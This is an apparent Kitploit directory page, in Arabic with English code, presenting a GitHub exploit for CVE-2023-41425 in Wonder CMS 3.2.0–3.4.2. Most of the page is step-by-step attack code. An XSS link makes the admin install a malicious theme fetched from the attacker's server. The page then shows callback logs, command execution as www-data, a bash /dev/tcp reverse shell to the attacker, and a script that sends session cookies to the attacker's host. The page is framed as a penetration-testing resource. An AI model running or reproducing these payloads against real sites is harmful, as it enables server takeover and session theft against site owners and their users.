Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-41425 — XSS-to-RCE استغلال لـ Wonder CMS 3.2.0–3.4.2 مع تسليم حمولة تلقائي، وقشرة عكسية، وسرقة ملفات تعريف الارتباط عبر تثبيت سمة خبيثة. | Kitploit
أدوات/GitHubGitHub/charlesgargasson/cve-2023-41425
توليد الحمولةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتالتصيد الاحتيالياختبار الاختراق
GitHubcharlesgargasson/cve-2023-41425

CVE-2023-41425

XSS-to-RCE استغلال لـ Wonder CMS 3.2.0–3.4.2 مع تسليم حمولة تلقائي، وقشرة عكسية، وسرقة ملفات تعريف الارتباط عبر تثبيت سمة خبيثة.

عرض المستودع
112منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

############## Wonder CMS RCE (تنفيذ الأوامر عن بعد) ##############

| | الوصف : XSS إلى RCE، Wonder CMS 3.2.0 <= 3.4.2 | المصادر | - https://github.com/prodigiousMind/CVE-2023-41425/tree/main | - https://nvd.nist.gov/vuln/detail/CVE-2023-41425 |


RCE


.. code-block:: bash

Setting vars

RHOST="http://host.com:80" LHOST="10.10.14.152" LPORT="4444" LPORTWEB="80"

Moving to a tmp dir

cd $(mktemp -d)

Creating our evil theme zip file

mkdir -p evil cat <<'EOF'>evil/evil.php

EOF

zip -r evil.zip evil/

JS payload that will install the new theme

cat <xssrce.js var xhr=new XMLHttpRequest(); xhr.open("GET", "${RHOST}/?installModule=http://${LHOST}:${LPORTWEB}/evil.zip&directoryName=whatever&type=themes&token=" + document.querySelectorAll('[name="token"]')[0].value, true); xhr.send(); EOF

Print XSS url

echo -e "\n# XSS RCE" cat <<EOF ${RHOST}/index.php?page=loginURL?"><script+src="http://${LHOST}:${LPORTWEB}/xssrce.js"><form+action=" EOF

Starting a new web server to serve payloads

sudo python3 -m http.server $LPORTWEB &

|

| بعد إرسال XSS RCE إلى المسؤول، نحصل على استدعاءات http التالية

.. code-block::

10.129.252.14 - - [11/Aug/2024 18:42:26] "GET /xssrce.js HTTP/1.1" 304 - 10.129.252.14 - - [11/Aug/2024 18:42:31] "GET /evil.zip HTTP/1.1" 200 - 10.129.252.14 - - [11/Aug/2024 18:42:31] "GET /evil.zip HTTP/1.1" 200 - 10.129.252.14 - - [11/Aug/2024 18:42:31] "GET /evil.zip HTTP/1.1" 200 - 10.129.252.14 - - [11/Aug/2024 18:42:32] "GET /evil.zip HTTP/1.1" 200 -

|

| يمكننا الآن استخدام حمولة php

.. code-block:: bash

id

CMD="id" curl --path-as-is "${RHOST}/themes/evil/evil.php?0=$(echo -n "$CMD"| python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))")"

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Reverse shell, (don't forget to listen first: nc -nvlp 4444)

CMD="bash -c 'bash -i >& /dev/tcp/${LHOST}/${LPORT} 0>&1'" curl --path-as-is "${RHOST}/themes/evil/evil.php?0=$(echo -n "$CMD"| python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))")"

|


الكوكيز


| يمكنك أيضًا سرقة الكوكيز (وبالتالي جلسة PHP)

.. code-block:: bash

cat <xsscookie.js var xhr=new XMLHttpRequest(); xhr.open("GET", "http://${LHOST}:${LPORTWEB}/?"+document.cookie, true); xhr.send(); EOF

echo -e "\n# XSS Retrieve PHP session" cat <<EOF ${RHOST}/index.php?page=loginURL?"><script+src="http://${LHOST}:${LPORTWEB}/xsscookie.js"><form+action=" EOF

|

تنزيل الأداة